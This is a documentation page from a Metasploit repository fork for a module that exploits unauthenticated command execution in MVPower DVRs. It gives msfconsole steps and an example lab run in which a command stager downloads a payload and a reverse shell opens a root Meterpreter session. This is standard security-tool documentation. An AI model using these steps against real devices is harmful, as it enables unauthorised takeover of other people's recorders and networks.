adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
0f6e2a62b571e4c3f5ddd4e24d74eb7bc00af32d
metasploit-gs/documentation/modules/exploit/linux/http/mvpower_dvr_shell_exec.md
T
Brendan Coles c9e09491dd Add documentation
2017-02-23 07:44:45 +00:00

1.3 KiB
Raw Blame History

Vulnerable Application

This module exploits an unauthenticated remote command execution vulnerability in MVPower digital video recorders. The 'shell' file on the web interface executes arbitrary operating system commands in the query string.

This module was tested successfully on a MVPower model TV-7104HE with firmware version 1.8.4 115215B9 (Build 2014/11/17).

The TV-7108HE model is also reportedly affected, but untested.

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/linux/http/mvpower_dvr_shell_exec
  3. Do: set rhost [IP]
  4. Do: set lhost [IP]
  5. Do: run
  6. You should get a session

Example Run

msf exploit(mvpower_dvr_shell_exec) > run

[*] Started reverse TCP handler on 10.1.1.197:4444 
[*] 10.1.1.191:80 - Connecting to target
[+] 10.1.1.191:80 - Target is vulnerable!
[*] Using URL: http://0.0.0.0:8080/BBRyjDtj81x3bTq
[*] Local IP: http://10.1.1.197:8080/BBRyjDtj81x3bTq
[*] Meterpreter session 1 opened (10.1.1.197:4444 -> 10.1.1.191:56881) at 2017-02-21 23:59:33 -0500
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 10.1.1.191
OS           :  (Linux 3.0.8)
Architecture : armv7l
Meterpreter  : armle/linux
meterpreter >
Reference in New Issue View Git Blame Copy Permalink